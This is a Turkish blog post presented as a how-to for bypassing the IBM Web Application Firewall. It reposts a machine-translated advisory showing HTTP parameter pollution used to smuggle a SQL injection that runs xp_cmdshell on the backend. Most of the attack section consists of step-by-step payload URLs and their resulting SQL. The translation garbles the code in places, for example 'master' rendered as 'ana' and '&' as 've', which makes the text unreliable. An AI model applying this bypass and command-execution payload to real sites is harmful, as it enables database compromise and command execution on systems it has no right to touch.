Header Ads

IBM Security Web Applications Nasıl Bypass Edilir ?

Merhaba CyberGuilty Okurları;

Bugün sizlere daha önce wafw000f nasıl kullanıldığından bahsetmiştim.
Waf yani "Web Application Firewall" sizin web uygulamaları üzerinde güvenlik açıkları taramanızı engelleyen güvenlik duvarlarıdır.
En bilinen güvenlik duvarları ;
Profense
NetContinuum
Incapsula WAF
CloudFlare
USP Secure Entry Server
Cisco ACE XML Gateway
Barracuda Application Firewall
Art of Defence HyperGuard
BinarySec
Teros WAF
F5 BIG-IP LTM
F5 BIG-IP APM
F5 BIG-IP ASM
F5 FirePass
F5 Trafficshield
InfoGuard Airlock
Citrix NetScaler
Trustwave ModSecurity
IBM Web Application Security
IBM DataPower
DenyALL WAF
Applicure dotDefender
Juniper WebApp Secure
Microsoft URLScan
Aqtronix WebKnight
eEye Digital Security SecureIIS
Imperva SecureSphere
Microsoft ISA Server

 
 Burada biz bugün teknoloji devi olan "IBM Web Application Security" bypass için sizlere keşfedilmiş bir exploiti anlatacağım.
  • IBM Web Application Firewall Bypass Exploit

    Satıcı: IBM
    Ürün: IBM Web Uygulaması Güvenlik Duvarı
    Bu yetenekler SiteProtector 7.0 ve sonrası ile dahil edilir
    IBM Security Network içindeki yazılımlar IPS GX ürünleri, IBM Security Server
    Koruma ürünleri ve IBM Güvenlik Çok Fonksiyonlu ürün serileri
    2009'un 2H.

    Etkilenen sürümler:
    G400 IPS-G400-IB-1 (Intrusion Prevention
    Güncelleme: 2011-03-11 00:34:23 - sürüm: 31.030) ve GX4004 IPS-GX4004-IB-2
    (Saldırı Önleme Güncelleştirmesi: 2011-03-10 23:49:15 - sürüm: 31.030).

    Ürün Açıklaması:
    IBM Web Uygulaması Güvenlik Duvarı
    IBM Security'nin web uygulaması güvenlik önlemleri portföyünü tamamlayın
    Uçtan uca Web uygulaması güvenlik çözümleri sunmak için.

    Kredi: Wendel Guglielmetti, Trustwave'in SpiderLabs'ında Henrique

    Bulma: IBM Web Application Firewall Bypass

    IBM Web Application Firewall, bir saldırganın
    Ürünün korumak istediği web açıklarını sömürmeye çalışın. Sorun
    Bir saldırgan aynı parametrenin tekrar eden durumlarını gönderdiğinde oluşur.

    Aşağıda gösterilen örnek aşağıdaki ortamı kullanır:
    Microsoft IIS, ASP .NET teknolojisi, Microsoft'un kullandığı bir web ortamı
    SQL Server 2000, IBM Web Application Firewall tarafından korunuyor.

    Beklendiği gibi, aşağıdaki talep tespit edilecek ve engellenecektir
    IBM Web uygulaması güvenlik duvarının yaptığı yapılandırma.

    Http: //sitename/find_ta_def.aspx? Id = 2571 & iid = '; EXEC
    Master..xp_cmdshell "ping 10.1.1.3" -

    IIS, ASP.NET (ve hatta saf ASP) teknolojisi ile içeriği birleştirir
    Bir parametrenin birden çok girişi talebin bir parçasıysa.

    Http: //sitename/find_ta_def.aspx? Id = 2571 & iid = '; EXEC
    Master..xp_cmdshell ve iid = "ping 10.1.1.3" -

    IIS, ASP.NET (ve hatta saf ASP) teknolojisi ile hem
    Iid parametresinin girdileri, ancak virgül içeriyor "," arasında "
    Ve ortaya çıkan çıktı veritabanında.

    '; EXEC ana..xp_cmdshell, "ping 10.1.1.3" -

    Yukarıdaki talep belirlenecek ve engellenecektir (bağlı olarak
    Yapılandırma) IBM Web uygulaması güvenlik duvarı tarafından
    "EXEC" ve "xp_cmdshell" saldırı modelini tetikler.

    Bununla birlikte, tüm alanları birden fazla parametreyle bölmek mümkündür. İçin
    Örnek:

    Http: //sitename/find_ta_def.aspx? Id = 2571 & iid = '; & Iid = EXEC
    & Iid = ana..xp_cmdshell ve iid = "ping 10.1.1.3" ve iid = -

    Yukarıdaki istek, etkilenen IBM Web uygulaması güvenlik duvarını atlayacak,
    Veritabanına gönderilen aşağıdaki çıktılar sonucu.

    '; , EXEC, master..xp_cmdshell, "ping 10.1.1.3", -

    Bununla birlikte, yukarıdaki SQL kodu doğru şekilde çalıştırılamaz.
    Comma SQL sorgusuna eklenir, bu durumu çözmek için SQL kullanacağız.
    Yorumlar.

    Http: //sitename/find_ta_def.aspx? Id = 2571 & iid = '; / * & Iid = 1 * / EXEC
    / * & Iid = 1 * / master..xp_cmdshell / * & iid = 1 * / "ping 10.1.1.3" / * ve iid = 1 * / -

    Yukarıdaki talep IBM Web uygulaması güvenlik duvarını atlayacak ve sonuçta
    Aşağıdaki çıktılar veritabanına gönderilir; bu geçerli ve
    Çalışma SQL kodu.

    '; / *, 1 * / EXEC / *, 1 * / master..xp_cmdshell / *, 1 * / "ping 10.1.1.3"

    Yukarıdaki kod, Microsoft Windows'ta ping komutunu çalıştırır
    Backend, uygulamanın idari düzeyde çalıştığını varsayarak
    Ayrıcalıklar.

    Bu saldırı sınıfına HTTP Kirlilik Saldırısı,
    HTTP Parametre Kirliliği (HPP) ve HTTP Parametre Birleştirme.

    Bu sorunun yararı altyapıya bağlıdır (WebSunucusu,
    Geliştirme Çerçeve Teknolojisi, vb.) Teknolojisi kullanılmaktadır.
    Official Twitter Accounts 
CyberGuilty INC. Blogger tarafından desteklenmektedir.